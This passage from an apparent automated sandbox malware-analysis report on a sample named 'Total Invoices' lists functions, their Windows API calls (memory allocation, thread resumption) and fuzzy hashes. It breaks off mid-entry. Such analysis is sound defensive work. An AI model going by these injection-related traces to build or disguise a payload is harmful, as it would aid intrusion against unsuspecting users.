                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 9523e2056779a8520ce15748c53af6a4dc2cc6b306f60787041a2e499507565a
                                                                                        • Instruction ID: 1be9a2e67c2f678e10a4a7256997ba525d8e7c34bc1e8dd5d4e404c2d4c304e7
                                                                                        • Opcode Fuzzy Hash: 9523e2056779a8520ce15748c53af6a4dc2cc6b306f60787041a2e499507565a
                                                                                        • Instruction Fuzzy Hash: 8F1137B19002499FCB10DFAAC844BEFBFF5EF88324F20841AE559A7250C775A944CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADDA80 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07ADDAF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 43d63e846ff267c6ca43c00463cfb5ed262b8bd0bd4a396ccb6e7e25d271ea83
                                                                                        • Instruction ID: 43e0f72c68d38000ccd4ece64e6ce375bd773caff9f46d9213d1218e9234f55e
                                                                                        • Opcode Fuzzy Hash: 43d63e846ff267c6ca43c00463cfb5ed262b8bd0bd4a396ccb6e7e25d271ea83
                                                                                        • Instruction Fuzzy Hash: 24116AB69002499FCB10DFA9C845BEEBFF5AF88320F24841AE559A7250C7799950CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADD4C8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: fcafcfa73e55478c26a728b7731d104d9f95b146c506500887c4d685b6712bbe
                                                                                        • Instruction ID: 0a0a4015395597718ebfc2d829264f377f14888800c0d89e153ea5864a02be36
                                                                                        • Opcode Fuzzy Hash: fcafcfa73e55478c26a728b7731d104d9f95b146c506500887c4d685b6712bbe
                                                                                        • Instruction Fuzzy Hash: A4113AB1D002598FCB10DFAAC4457EEFFF4EB88324F20842AD559A7250C775A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADD4C0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 53785aa783d80d4c7573c09867a5c8ece2cf52e5227327457b69374067c148e0
                                                                                        • Instruction ID: 6c79a84adef3c90a0ffc320a06e18f3087dd27343a714827dfd674885dd7e6f3
                                                                                        • Opcode Fuzzy Hash: 53785aa783d80d4c7573c09867a5c8ece2cf52e5227327457b69374067c148e0
                                                                                        • Instruction Fuzzy Hash: 2D116AB1D00259CFDB10DFAAC4457EEFFF4AB88324F20882AC059A7240C735A944CF99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015EAFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 015EB01E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: b6963af92e2f5af8350be8b9cd566d6759917dc9c600876cca8fe511d23d8614
                                                                                        • Instruction ID: 3185243be3dc9322f71c4f007989f0ef1b9d629bd7e90ad5ef4c5cc11cd813ec
                                                                                        • Opcode Fuzzy Hash: b6963af92e2f5af8350be8b9cd566d6759917dc9c600876cca8fe511d23d8614
                                                                                        • Instruction Fuzzy Hash: 0B11E0B5C003498FDB14CF9AD448BDEFBF4AB88324F10842AD569AB210D375A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0DE42999 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0DE429FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1739611139.000000000DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DE40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_de40000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: b6b7cb9fc7185001dd604acfa0c3005b8e194b5176a87b14e70bea39af48c5d9
                                                                                        • Instruction ID: ef1aa7c992a637977a84dfee719523656504e6e0ba2647c015966a21dac65dcb
                                                                                        • Opcode Fuzzy Hash: b6b7cb9fc7185001dd604acfa0c3005b8e194b5176a87b14e70bea39af48c5d9
                                                                                        • Instruction Fuzzy Hash: 971133B5800349CFDB10CF99D585BEEFBF4EB48320F10841AE958A7240C375A584CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0DE429A0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0DE429FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1739611139.000000000DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DE40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_de40000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 5b778d999df42f52325e946561770a895a56325bd1c8c0279efc6fd4f0b2307d
                                                                                        • Instruction ID: 005fb877a15e858259d4b7ba12d9b7993bc2aba2e2d2f57a17afa35a2d69b0b8
                                                                                        • Opcode Fuzzy Hash: 5b778d999df42f52325e946561770a895a56325bd1c8c0279efc6fd4f0b2307d
                                                                                        • Instruction Fuzzy Hash: 9311D3B58003499FDB10DF9AD445BDEFBF8EB48324F108419E558A7250C375A584CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0158D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728960905.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_158d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9fad40844872c349c984de2bb0245abcd3a28e4f9594c3262b0c342d0ebdf3eb
                                                                                        • Instruction ID: d2d28d36e8159dd8e8cc71a2703986964778df94d9aa4d08b27863317cc8d071
                                                                                        • Opcode Fuzzy Hash: 9fad40844872c349c984de2bb0245abcd3a28e4f9594c3262b0c342d0ebdf3eb
                                                                                        • Instruction Fuzzy Hash: 3A214871100204DFDB01EF48D9C0B5ABFF5FB84324F20C569D9091F2A6C376E446C6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0158D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728960905.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_158d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 42af7f49a83032e5b1d764c66fb59ab05491b39c6c3ec80b7b76729f551e56d8
                                                                                        • Instruction ID: 93beb6c6adff93947a85d51895cdeb47e05f0dc6a231ca95e08b9c1ee3614b5c
                                                                                        • Opcode Fuzzy Hash: 42af7f49a83032e5b1d764c66fb59ab05491b39c6c3ec80b7b76729f551e56d8
                                                                                        • Instruction Fuzzy Hash: C721C171504240DFDB05EF58D9C0B2ABFF5FB88318F24C56AE9095E296C336D456CAB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0159D01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729056724.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_159d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3e6e9c297b11e33f1e582f025835e8a7dba1fe33c07860a628e2e7df772f263
                                                                                        • Instruction ID: 00dfbe48ba87d42ea57407b0dffe9910d865167b8039cd5d593a6a31dea570b3
                                                                                        • Opcode Fuzzy Hash: b3e6e9c297b11e33f1e582f025835e8a7dba1fe33c07860a628e2e7df772f263
                                                                                        • Instruction Fuzzy Hash: 2B210071604200DFDF15DF68D984B2ABBB5FB84354F20C969D80A4F256D33AD446CA62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0159D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729056724.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_159d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4f175dc31adaa1ed8147230e0421d10199baad82a2383d2e4fa16ca46816fe51
                                                                                        • Instruction ID: 984a775e48c46cb2318fb3b499445bcc9df67e4264e17f26c72b421331ae5429
                                                                                        • Opcode Fuzzy Hash: 4f175dc31adaa1ed8147230e0421d10199baad82a2383d2e4fa16ca46816fe51
                                                                                        • Instruction Fuzzy Hash: 0A212971504200DFDF05DF98D6C0B2ABBB5FB84324F24C9ADD9094F296C33AD446CA62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0159D006 Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729056724.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_159d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ad12d037e148dd97e183e04848247494c9e249270dc2dec521abfcd6f1db811e
                                                                                        • Instruction ID: 07e1db9252aba8b810ec0cf09e98012d91cc805873e04b90b2a0c6060f6e1bd2
                                                                                        • Opcode Fuzzy Hash: ad12d037e148dd97e183e04848247494c9e249270dc2dec521abfcd6f1db811e
                                                                                        • Instruction Fuzzy Hash: 5B219D755093808FDB03CF64D994B15BF71FB46214F28C5EAD8498F2A7C33A980ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0158D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728960905.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_158d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction ID: 26258f6d8c2d73a48ad45a1da9cf832650579a4434c286964f599502f2907a6c
                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction Fuzzy Hash: 5311DF72504240DFDB02DF48D5C4B5ABFB1FB94324F24C2A9D9090F266C37AE45ACBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0158D4BF Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728960905.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_158d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction ID: b4672e7b361e63dba1cd1194bd003b62cffdda8655805f4a437c9705150d1598
                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction Fuzzy Hash: BD11E172504280CFCB02DF54D5C4B1ABFB1FB84318F24C6AAD8090F656C33AD45ACBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0159D1CF Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729056724.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_159d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                        • Instruction ID: eaba8be20ddfaaebd46d1c18608070657f01d9fed6d966a8b3b35fa55c8f0ab0
                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                        • Instruction Fuzzy Hash: B6118B75504280DFDF16CF54D5C4B19BFB1FB84224F28C6AAD8494F696C33AD44ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0158D745 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728960905.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_158d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d1308299bf18f2db953c846278aeb37f89931ba158dfdd6044d10e5aa810d39a
                                                                                        • Instruction ID: 638eeef3968dc28f108b989c423b571f8b9305191f0eadb5e53b0355b2bb2eb9
                                                                                        • Opcode Fuzzy Hash: d1308299bf18f2db953c846278aeb37f89931ba158dfdd6044d10e5aa810d39a
                                                                                        • Instruction Fuzzy Hash: 2401FC7110438099E7107E69CD8475BBFECFF41324F08C929ED089E2C6C239D440C671
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0158D744 Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728960905.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_158d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 07637522a674ba411f055639a630a5b5d1408fb31439cc44e53bb58a35df4097
                                                                                        • Instruction ID: 48cf5cffab5aa79c8af9428f01e2d7602cb6a303ddc8ecb0de737300be9f19cb
                                                                                        • Opcode Fuzzy Hash: 07637522a674ba411f055639a630a5b5d1408fb31439cc44e53bb58a35df4097
                                                                                        • Instruction Fuzzy Hash: A3F062715053849AE711AE1AC888B66FFE8FB81634F18C55AED485E286C2799844CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 07AD43D8 Relevance: 4.0, Strings: 3, Instructions: 253COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: T+-q$[V~*$]\`
                                                                                        • API String ID: 0-3978741314
                                                                                        • Opcode ID: 3a338567faefc41b46d7e59d71716cb8b3912c50c8a0beebdf3a3088777358f5
                                                                                        • Instruction ID: 9f0fa9957ff7ec61df085e451480194230a64a0d036adb7fb9b5445a313a296f
                                                                                        • Opcode Fuzzy Hash: 3a338567faefc41b46d7e59d71716cb8b3912c50c8a0beebdf3a3088777358f5
                                                                                        • Instruction Fuzzy Hash: F7B115B0E152599BCB04CFAAD9848DEFBF2FF89300F14D52AD826BB218D73099418F54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07AD4594 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: T+-q$[V~*$]\`
                                                                                        • API String ID: 0-3978741314
                                                                                        • Opcode ID: 54fdc5d5506752d8550ba49ba30aad1b442af824d6999d2457a6fee1c6340e23
                                                                                        • Instruction ID: 60c1826992a1fba1e5e1f4ef2140b0592655fafaa5a0fa908166ea2a3e6a842c
                                                                                        • Opcode Fuzzy Hash: 54fdc5d5506752d8550ba49ba30aad1b442af824d6999d2457a6fee1c6340e23
                                                                                        • Instruction Fuzzy Hash: 1981E8F4E15259DB8B04CFE9D9808DEFBB6FF99300F149516D826BB214D33099418F55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADAD88 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ~N<R
                                                                                        • API String ID: 0-641130846
                                                                                        • Opcode ID: b9cb5b37b9908b757d1c5c13b91806e2e5096fb487ef7f9ab19f7179e4bd1ade
                                                                                        • Instruction ID: e2e829bf123e5cbaf4de4804a6d616c0fad16cd14f3affc03cedaba7b1b90dab
                                                                                        • Opcode Fuzzy Hash: b9cb5b37b9908b757d1c5c13b91806e2e5096fb487ef7f9ab19f7179e4bd1ade
                                                                                        • Instruction Fuzzy Hash: 6CE1E9B4E101198FDB14DFA9C5809AEFBB2FF89304F248169E425AB356D734AD81CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADAD70 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ~N<R
                                                                                        • API String ID: 0-641130846
                                                                                        • Opcode ID: 315f245b699674c60aae5c455234933f7fcb7b305295a5309d0370d0ea1e2348
                                                                                        • Instruction ID: 6628390d316f64460d532977e53fc6b8065a5fa0f9866e6696fa4434fdb98346
                                                                                        • Opcode Fuzzy Hash: 315f245b699674c60aae5c455234933f7fcb7b305295a5309d0370d0ea1e2348
                                                                                        • Instruction Fuzzy Hash: 40511BB5E0021A8BDB14DFAAC9805AEBBF2BF89300F24C16AD419A7256D7349D41CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADD650 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 623464e9fc4391e2bd0d6e42419fbc6db4339c7855c57783ad6bd0b5061dc952
                                                                                        • Instruction ID: ce4f23b8caef1cad7c267c17b4feaf542410e2f486b58a46e053e64046b391e3
                                                                                        • Opcode Fuzzy Hash: 623464e9fc4391e2bd0d6e42419fbc6db4339c7855c57783ad6bd0b5061dc952
                                                                                        • Instruction Fuzzy Hash: 7AE10CB4E101198FDB14DFA9C5809AEFBB2FF89304F24815AE415AB355D731AD81CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADB5F8 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b6006ce90e20012639dc17e272ffbc588dcad78a86cbeb11fa5e03d2938c45f7
                                                                                        • Instruction ID: babe1e4c8122d3c1ce35ff0fc98cf168a83fafeb164084e29cb5574a2313f811
                                                                                        • Opcode Fuzzy Hash: b6006ce90e20012639dc17e272ffbc588dcad78a86cbeb11fa5e03d2938c45f7
                                                                                        • Instruction Fuzzy Hash: 5EE10AB4E011198FDB14DFA9C5809AEFBB2FF89304F258169E415AB356D730AD81CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADB1C0 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6b2a3d6337c25d68a55945aed0f658637fb5523ec5c3f878f911fc2fd7594f58
                                                                                        • Instruction ID: b60c6a4183572e8810379deb1ecb3d199c04f3b2e7b94bcd74316560f2572e06
                                                                                        • Opcode Fuzzy Hash: 6b2a3d6337c25d68a55945aed0f658637fb5523ec5c3f878f911fc2fd7594f58
                                                                                        • Instruction Fuzzy Hash: FEE1F9B4E101198FDB14DFA9C5809AEFBB2FF89304F258169E415AB356DB30AD81CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADCCA0 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d2a15e5bcfe6e2edb5c4baff3a1d2db57000dfd7707659603371688d6a783b67
                                                                                        • Instruction ID: a070cd78a71183661d6780205d47829dda403629083f6e4b703e40afb52d1fb4
                                                                                        • Opcode Fuzzy Hash: d2a15e5bcfe6e2edb5c4baff3a1d2db57000dfd7707659603371688d6a783b67
                                                                                        • Instruction Fuzzy Hash: 79E11DB4E101198FDB14DFA9C5809AEFBB2FF89314F248169E415AB356D731AD82CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07AD22B0 Relevance: .3, Instructions: 270COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f5b4ccef6d029d7e3851fee097b87deb11b1e7b5a7ff1208c893cf4fa35de22e
                                                                                        • Instruction ID: 9746cfd50786eda2d744882c9e829b171e56c1ca81f4aa43b290c2d8200a0ae4
                                                                                        • Opcode Fuzzy Hash: f5b4ccef6d029d7e3851fee097b87deb11b1e7b5a7ff1208c893cf4fa35de22e
                                                                                        • Instruction Fuzzy Hash: F1D1C63582075ACACB10EB65D994A9DB7B1FF95300F50D79AD0093B261EF70AAC9CF81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07AD22C0 Relevance: .3, Instructions: 264COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2618db1329c49bb65cc94610680e140de09492810d1d78e946f10b067f422073
                                                                                        • Instruction ID: 7448b6b4cc261fc1f7e7a14e9304c7ac56373de3667882d8e0d82f69973368c9
                                                                                        • Opcode Fuzzy Hash: 2618db1329c49bb65cc94610680e140de09492810d1d78e946f10b067f422073
                                                                                        • Instruction Fuzzy Hash: E2D1C63582075ACACB10EB65D994A9DB7B1FF95300F50D79AD0093B261EF70AAC9CF81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015ED5DC Relevance: .3, Instructions: 264COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
